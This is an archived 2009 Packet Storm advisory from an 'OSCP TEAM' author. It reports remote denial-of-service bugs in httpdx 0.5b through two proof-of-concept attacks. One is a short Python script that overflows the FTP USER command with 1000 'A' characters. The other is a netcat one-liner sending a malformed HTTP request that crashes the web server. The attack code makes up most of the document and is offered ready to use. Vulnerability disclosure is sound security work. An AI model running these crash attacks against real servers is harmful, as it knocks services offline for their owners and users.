httpdx 0.5b Denial Of Service

2009-05-19T00:00:00
ID PACKETSTORM:77585
Type packetstorm
Reporter sico2819
Modified 2009-05-19T00:00:00

Description

                                        
                                            `*****************************  
* OSCP TEAM Vuln Discovery *  
*****************************  
* sico2819 *  
*****************************  
  
http://offensive-security.com  
  
**************************************  
httpdx <= 0.5b multiple remote DOS POC  
**************************************  
  
sourceforge.net/projects/httpdx/  
  
  
SYSTEM USED : WinXP SP3 FR  
  
  
***************  
POC POC POC POC  
***************  
  
  
httpdx <= 0.5b is vulnerable to multiple remote DOS, in both HTTP and FTP server.  
  
*******************  
***** FTP DOS *****  
*******************  
  
httpdx FTP crashed by multiple ways, due to BOF in many commands (USER, PASS, CWD, ...)  
  
POC :  
  
------ poc.py ----------  
  
import socket  
  
HOST = [ change host addr ]  
PORT = 21  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((HOST, PORT))  
data= s.recv(1024)  
s.send('USER '+'A'*1000)  
s.close()  
  
------- EOF -------------  
  
*******************  
**** HTTP DOS *****  
*******************  
  
httpdx crashed by sending a special HTTP request :  
  
"GET / HTTP/1.1Host: "  
  
POC :  
  
echo "GET / HTTP/1.1Host: "|nc [HOST] 80  
  
  
  
  
  
This is a OSCP Team POC, more to come !!  
  
sico2819  
  
  
`